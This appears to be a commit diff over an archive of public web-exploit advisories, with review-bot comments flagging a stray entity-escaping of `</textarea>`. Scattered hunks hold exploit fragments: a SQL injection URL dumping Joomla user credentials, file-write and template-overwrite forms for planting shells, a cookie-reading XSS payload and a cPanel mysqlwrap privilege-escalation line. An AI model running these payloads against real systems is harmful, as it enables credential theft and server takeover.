o_,_7 _|| . _o_7 _|| 4_|_|| o_w_, o_,_7 _|| . _o_7 _|| 4_|_|| o_w_,
( : / (_) / ( . ( : / (_) / ( .

View file

@ -1,4 +1,3 @@
|| || | || || || | ||
o_,_7 _|| . _o_7 _|| 4_|_|| o_w_, o_,_7 _|| . _o_7 _|| 4_|_|| o_w_,
( : / (_) / ( . ( : / (_) / ( .

View file

@ -1,4 +1,3 @@
Script : DS CMS 1.0 (NewsId) Remote SQL Injection Vulnerability Script : DS CMS 1.0 (NewsId) Remote SQL Injection Vulnerability
Script site : http://cms.dsinternal.com/Home Script site : http://cms.dsinternal.com/Home

View file

@ -1,4 +1,3 @@
[?] ?????????????????????????{In The Name Of Allah The Mercifull}?????????????????????? [?] ?????????????????????????{In The Name Of Allah The Mercifull}??????????????????????
[?] [?]
[~] Tybe: Joomla Bamboo Simpla Admin Template suffer from REMOTe sql injection [~] Tybe: Joomla Bamboo Simpla Admin Template suffer from REMOTe sql injection

View file

@ -1,4 +1,3 @@
# Exploit Title: Joomla component com_oziogallery2 / IMAGIN arbitrary file write # Exploit Title: Joomla component com_oziogallery2 / IMAGIN arbitrary file write
# Date: 01-01-10 # Date: 01-01-10
# Author: Ubik and er # Author: Ubik and er

View file

@ -1,4 +1,3 @@
http://server/index.php?option=com_videos&act=view&Itemid=27&id=-1084+UNION SELECT 1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+jos_users http://server/index.php?option=com_videos&act=view&Itemid=27&id=-1084+UNION SELECT 1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+jos_users
Snakespc Snakespc

View file

@ -1,4 +1,3 @@
######################################################################## ########################################################################
##uGround v1.0b SQL Injection ## ##uGround v1.0b SQL Injection ##
######################################################################## ########################################################################

View file

@ -1,6 +1,5 @@
======================================================================= =======================================================================
Softbiz Jobs CSRF Vulnerability Softbiz Jobs CSRF Vulnerability

View file

@ -1,4 +1,3 @@
============================================================================================================== ==============================================================================================================

View file

@ -1,4 +1,3 @@
======================================================== ========================================================
PHP-fusion dsmsf (module downloads) SQL Inj3ct0r Exploit PHP-fusion dsmsf (module downloads) SQL Inj3ct0r Exploit
======================================================== ========================================================

View file

@ -1,4 +1,3 @@
====================================================================================================================== ======================================================================================================================

View file

@ -1,4 +1,3 @@
========================================================================================================================= =========================================================================================================================

View file

@ -1,4 +1,3 @@
============================================================================================================================ ============================================================================================================================

View file

@ -1,4 +1,3 @@
========================================================================================================= =========================================================================================================

View file

@ -1,4 +1,3 @@
============================================================================================================ ============================================================================================================

View file

@ -1,5 +1,4 @@
============================================================================================================= =============================================================================================================

View file

@ -1,4 +1,3 @@
================================================================================================================== ==================================================================================================================

View file

@ -1,4 +1,3 @@
============================================================================================================ ============================================================================================================

View file

@ -1,4 +1,3 @@
=============================================================================================================== ===============================================================================================================

View file

@ -1,4 +1,3 @@
=============================================================================================================== ===============================================================================================================

View file

@ -1,4 +1,3 @@
(o)===============================================================================(o) (o)===============================================================================(o)
Joomla Component aWiki Local File Inclusion Joomla Component aWiki Local File Inclusion

View file

@ -1,4 +1,3 @@
============================================= =============================================
Kubeit CMS Remote SQL Injection Vulnerability Kubeit CMS Remote SQL Injection Vulnerability
============================================= =============================================

View file

@ -1,4 +1,3 @@
=============================================================================================================== ===============================================================================================================

View file

@ -1,4 +1,3 @@
==================================================================================================== ====================================================================================================

View file

@ -1,4 +1,3 @@
================================================================================================================ ================================================================================================================

View file

@ -1,4 +1,3 @@
======================================================================================================================= =======================================================================================================================

View file

@ -1,4 +1,3 @@
=============================================================================================================== ===============================================================================================================

View file

@ -1,4 +1,3 @@
===================================================================================================================== =====================================================================================================================

View file

@ -1,4 +1,3 @@
================================================================================================================= =================================================================================================================

View file

@ -1,4 +1,3 @@
================================================================================================================== ==================================================================================================================

View file

@ -1,4 +1,3 @@
=================================================================================================================== ===================================================================================================================

View file

@ -1,4 +1,3 @@
=============================================================================================================== ===============================================================================================================

View file

@ -1,4 +1,3 @@
================================================================================================================ ================================================================================================================

View file

@ -1,4 +1,3 @@
============================================================================================================== ==============================================================================================================

View file

@ -1,4 +1,3 @@
================================================================================================================== ==================================================================================================================

View file

@ -1,4 +1,3 @@
=========================================================================================================== ===========================================================================================================

View file

@ -1,4 +1,3 @@
================================================================================================================= =================================================================================================================

View file

@ -1,4 +1,3 @@
=========================================================================================================== ===========================================================================================================

View file

@ -1,4 +1,3 @@
================================================================================================================= =================================================================================================================

View file

@ -1,4 +1,3 @@
========================================================================================================= =========================================================================================================

View file

@ -1,4 +1,3 @@
=============================================================================================================== ===============================================================================================================

View file

@ -1,4 +1,3 @@
================================================================================================================= =================================================================================================================

View file

@ -1,4 +1,3 @@
================================================================================================================== ==================================================================================================================

View file

@ -1,4 +1,3 @@
================================================================ ================================================================
Openreglement 1.04 (RFI/LFI) Multiple File Include Vulnerability Openreglement 1.04 (RFI/LFI) Multiple File Include Vulnerability
================================================================ ================================================================

View file

@ -1,4 +1,3 @@
============================================================================================================= =============================================================================================================

View file

@ -1,4 +1,3 @@
================================================ ================================================
Openpresse 1.01 Local File Include Vulnerability Openpresse 1.01 Local File Include Vulnerability
================================================ ================================================

View file

@ -1,4 +1,3 @@
=============================================================== ===============================================================
Openplanning 1.00 (RFI/LFI) Multiple File Include Vulnerability Openplanning 1.00 (RFI/LFI) Multiple File Include Vulnerability
=============================================================== ===============================================================

View file

@ -1,5 +1,4 @@
============================================================== ==============================================================
Openfoncier 2.00 (RFI/LFI) Multiple File Include Vulnerability Openfoncier 2.00 (RFI/LFI) Multiple File Include Vulnerability
============================================================== ==============================================================

View file

@ -1,4 +1,3 @@
======================================================================================================================= =======================================================================================================================

View file

@ -1,4 +1,3 @@
=============================================================================================================== ===============================================================================================================

View file

@ -1,4 +1,3 @@
Software: WHMCS control 2 Sql Injection Software: WHMCS control 2 Sql Injection
Vulnerability: Remote Sql Injection Vulnerability: Remote Sql Injection

View file

@ -1,4 +1,3 @@
Joomla Custom PHP Pages Component LFI Vulnerability Joomla Custom PHP Pages Component LFI Vulnerability
===================================================== =====================================================

View file

@ -1,4 +1,3 @@
========================================================================================================= =========================================================================================================

View file

@ -1,4 +1,3 @@
============================================================================================================= =============================================================================================================

View file

@ -1,4 +1,3 @@
______ _ _ _ ______ _ _ _
| ___ \ | | | | (_) | ___ \ | | | | (_)
| |_/ /_____ _____ | |_ _| |_ _ ___ _ __ | |_/ /_____ _____ | |_ _| |_ _ ___ _ __

View file

@ -36,7 +36,7 @@ FILE NAME:<br>
<input type="text" name="filename">&nbsp; (ex. shell.php)<br>FILE CONTENTS:<br> <input type="text" name="filename">&nbsp; (ex. shell.php)<br>FILE CONTENTS:<br>
<textarea name="file_contents" wrap="soft" cols="70" rows="10"></textarea> <textarea name="file_contents" wrap="soft" cols="70" rows="10">&lt;/textarea&gt;
<input name="submit" type="submit" value=" Save " > <input name="submit" type="submit" value=" Save " >

View file

@ -1,4 +1,3 @@
#################################################### ####################################################
# clickartweb Design SQL Injection Vulnerability # clickartweb Design SQL Injection Vulnerability
#################################################### ####################################################

@ -21,7 +21,7 @@ action="http://[target]/components/com_oziogallery2/imagin/scripts_ralcr/others/
<label for="subject">Subject:</label><input id="subject" name="subject" <label for="subject">Subject:</label><input id="subject" name="subject"
type="text" /><br /> type="text" /><br />
<label for="message">Message:</label><textarea id="message" <label for="message">Message:</label><textarea id="message"
name="message"></textarea><br /> name="message">&lt;/textarea&gt;<br />
<input type="submit" value="Send"/> <input type="submit" value="Send"/>
</form> </form>
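
Review bot: The `name="message">` line now ends the textarea with `&lt;/textarea&gt;` instead of `</textarea>`, so the `<br />`, the Send input and `</form>` all fall inside an unclosed textarea. The sibling hunks marked `-1,4 +1,3` only drop a leading line; this one alters body markup, which a header clean-up commit should not do. Revert the line to the raw closing tag.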

@ -37,7 +37,7 @@ FILE NAME:<br>
<input type="text" name="filename">  (ex. shell.php)<br>FILE CONTENTS:<br> <input type="text" name="filename">  (ex. shell.php)<br>FILE CONTENTS:<br>
<textarea name="file_contents" wrap="soft" cols="70" rows="10"></textarea> <textarea name="file_contents" wrap="soft" cols="70" rows="10">&lt;/textarea&gt;
<input name="submit" type="submit" value=" Save " > <input name="submit" type="submit" value=" Save " >
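
Review bot: The escaping on the `file_contents` line is inconsistent within a single line: the opening `<textarea name="file_contents" ...>` stays raw while only the closing tag becomes `&lt;/textarea&gt;`. That rules out deliberate sanitisation of the stored markup and suggests a tool rewrote the closing tag on its way through an HTML page. Restore `</textarea>` so the archived form parses as the author wrote it.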

@ -8,7 +8,7 @@
[PoC] [PoC]
1- XSS 1- XSS
- Post a message including the following line: </textarea>'"><script>alert(document.cookie)</script> - Post a message including the following line: &lt;/textarea&gt;'"><script>alert(document.cookie)</script>
- Valid. - Valid.
- Click on "Citer" to execute the script. - Click on "Citer" to execute the script.
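
Review bot: In the "Post a message including the following line" step, the reported test string used to start with `</textarea>` and now starts with `&lt;/textarea&gt;`, so the advisory no longer records the input the author actually reported. Anyone re-testing a fix from this text would submit a different string and could wrongly conclude the issue is closed. Advisory text should be stored verbatim; revert this line.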

@ -233,7 +233,7 @@ Date of Birth </td>
Signature (&lt; 100 characters) </td> Signature (&lt; 100 characters) </td>
<td bgcolor="#BBBBBB" colspan="3"> <td bgcolor="#BBBBBB" colspan="3">
<textarea name="sig" rows="3" cols="35"> </textarea> <textarea name="sig" rows="3" cols="35"> &lt;/textarea&gt;
</td> </td>
</tr> </tr>
<tr> <tr>
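
Review bot: On the `<textarea name="sig" rows="3" cols="35">` line the closing tag is now the literal text `&lt;/textarea&gt;`, leaving the signature field open so that the following `</td>`, `</tr>` and `<tr>` are consumed as textarea content and the table layout is lost. The change is limited to that one token and has no counterpart elsewhere in the hunk. Restore the raw `</textarea>`.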

@ -1,4 +1,3 @@
::::::::: :::::::::: ::: ::: ::::::::::: ::: ::::::::: :::::::::: ::: ::: ::::::::::: :::
:+: :+: :+: :+: :+: :+: :+: :+: :+: :+: :+: :+: :+: :+:
+:+ +:+ +:+ +:+ +:+ +:+ +:+ +:+ +:+ +:+ +:+ +:+ +:+ +:+

@ -44,7 +44,7 @@ fclose($f);
passthru("PERL5LIB=/tmp /usr/local/cpanel/bin/mysqlwrap nima"); passthru("PERL5LIB=/tmp /usr/local/cpanel/bin/mysqlwrap nima");
} }
?> ?>
</textarea> &lt;/textarea&gt;
<br> <br>
Powered By Ashiyane Security Corporation <a href="http://www.ashiyane.ir"> www.Ashiyane.ir Powered By Ashiyane Security Corporation <a href="http://www.ashiyane.ir"> www.Ashiyane.ir
</center> </center>
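
Review bot: The line after `?>` changes `</textarea>` to `&lt;/textarea&gt;`, so the textarea that displays the PHP source is never closed and the `<br>`, the "Powered By" link and `</center>` become part of its text. This modifies the archived page's markup without any stated reason. Keep the original closing tag.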

@ -62,7 +62,7 @@ $aname = explode( "><input type=text name=cname maxlength=64 value=\"",$data);
$bname = explode( "\">",$aname[1 ]); $bname = explode( "\">",$aname[1 ]);
$name = $bname[ 0]; $name = $bname[ 0];
$ahash = explode( "<textarea name=comment rows=10 cols=40 wrap=physical>",$data); $ahash = explode( "<textarea name=comment rows=10 cols=40 wrap=physical>",$data);
$bhash = explode( "</textarea>",$ahash[1 ]); $bhash = explode( "&lt;/textarea&gt;",$ahash[1 ]);
$hash = $bhash[ 0]; $hash = $bhash[ 0];
if(strlen($hash) != 32){ if(strlen($hash) != 32){
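
Review bot: The `$bhash = explode(...)` line changes a string literal in code, not markup: the delimiter goes from `</textarea>` to `&lt;/textarea&gt;`, while the `$ahash` line above still splits on the raw `<textarea name=comment ...>` tag. The two delimiters no longer agree, so `$bhash[0]` would normally hold everything after the opening tag and the `strlen($hash) != 32` branch would most likely be taken. An archive commit should not alter program logic; restore the original literal.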

@ -67,7 +67,7 @@
<select class=altButton name="newfileext"> <select class=altButton name="newfileext">
<option>.txt</option><option>.html</option><option>.php</option> <option>.txt</option><option>.html</option><option>.php</option>
</select> </select>
<textarea name="newcontent" cols="60" rows="15"></textarea> <textarea name="newcontent" cols="60" rows="15">&lt;/textarea&gt;
<input type="hidden" name="copt" value="1"> <input type="hidden" name="copt" value="1">
<input type="submit" name="savenew" value="Save"> <input type="submit" name="savenew" value="Save">
<input type="hidden" name="u" value=""> <input type="hidden" name="u" value="">
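
Review bot: On the `newcontent` line the textarea is now terminated by `&lt;/textarea&gt;` rather than `</textarea>`, so the hidden `copt` field, the `savenew` button and the hidden `u` field below it are parsed as textarea text and are no longer part of the form. Only the closing tag is touched while the opening tag on the same line is left raw. Revert to the raw closing tag.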

@ -1,4 +1,3 @@
******************************************************************************************* *******************************************************************************************
# Title : mxBB Module Charts <= 1.0.0(module_root_path) Remote File Include Vulnerability # Title : mxBB Module Charts <= 1.0.0(module_root_path) Remote File Include Vulnerability
# Author : ajann # Author : ajann

@ -1,4 +1,3 @@
_________________________________ _________________________________
________| |________ ________| |________
\ | S.W.A.T. | / \ | S.W.A.T. | /

@ -88,7 +88,7 @@ You can run exploit in html:
<form action="http://site.gov.pl/ggcms_path/admin/subpages.php" method="post"> <form action="http://site.gov.pl/ggcms_path/admin/subpages.php" method="post">
<input name="saveSubpage" value="1" /> <input name="saveSubpage" value="1" />
<input name="subpageName" value="../../../templates/default/index" /> <input name="subpageName" value="../../../templates/default/index" />
<textarea name="subpageContent"></textarea> <textarea name="subpageContent">&lt;/textarea&gt;
<input type="submit" value="Zapisz" /> <input type="submit" value="Zapisz" />
</form></html> </form></html>
[/code] [/code]
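
Review bot: The `subpageContent` line replaces `</textarea>` with `&lt;/textarea&gt;` inside a block the advisory delimits with `[/code]`, so the quoted form no longer matches what the author published: the "Zapisz" submit input and `</form></html>` end up inside an unclosed textarea. Content inside a code block should be preserved verbatim. Restore the original closing tag.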

@ -346,7 +346,7 @@ Set objtake=Nothing
<b><font color="#008000" face="Verdana" size="2">Whois Bilgileri</font></b><p> <b><font color="#008000" face="Verdana" size="2">Whois Bilgileri</font></b><p>
<textarea rows="20" name="S1" cols="68" style="font-family: Verdana; font-size: 10pt; color: #008000; border: 1px dotted #008000; background-color: #000000"> <textarea rows="20" name="S1" cols="68" style="font-family: Verdana; font-size: 10pt; color: #008000; border: 1px dotted #008000; background-color: #000000">
<% Response.Write "<" & sonuc %> <% Response.Write "<" & sonuc %>
</textarea> &lt;/textarea&gt;
</p> </p>
</center> </center>
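
Review bot: The line after `<% Response.Write "<" & sonuc %>` now reads `&lt;/textarea&gt;` instead of `</textarea>`, so the `S1` textarea opened two lines earlier is never closed and `</p>` and `</center>` are swallowed into it. The opening tag and the ASP expression are untouched, so this is an isolated entity-escaping of one token. Keep the raw closing tag.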

@ -345,7 +345,7 @@ Set objtake=Nothing
<b><font color="#008000" face="Verdana" size="2">Whois Bilgileri</font></b><p> <b><font color="#008000" face="Verdana" size="2">Whois Bilgileri</font></b><p>
<textarea rows="20" name="S1" cols="68" style="font-family: Verdana; font-size: 10pt; color: #008000; border: 1px dotted #008000; background-color: #000000"> <textarea rows="20" name="S1" cols="68" style="font-family: Verdana; font-size: 10pt; color: #008000; border: 1px dotted #008000; background-color: #000000">
<% Response.Write "<" & sonuc %> <% Response.Write "<" & sonuc %>
</textarea> &lt;/textarea&gt;
</p> </p>
</center> </center>
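
Review bot: This hunk makes the same single-token change on the line after `<% Response.Write "<" & sonuc %>` as the hunk at `-346,7`, only one line earlier in a different file, which indicates a blanket replace of `</textarea>` across the tree rather than per-file edits. Before merging, search the commit for `&lt;/textarea&gt;` and revert every occurrence that was a raw closing tag in the previous revision.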

Some files were not shown because too many files have changed in this diff.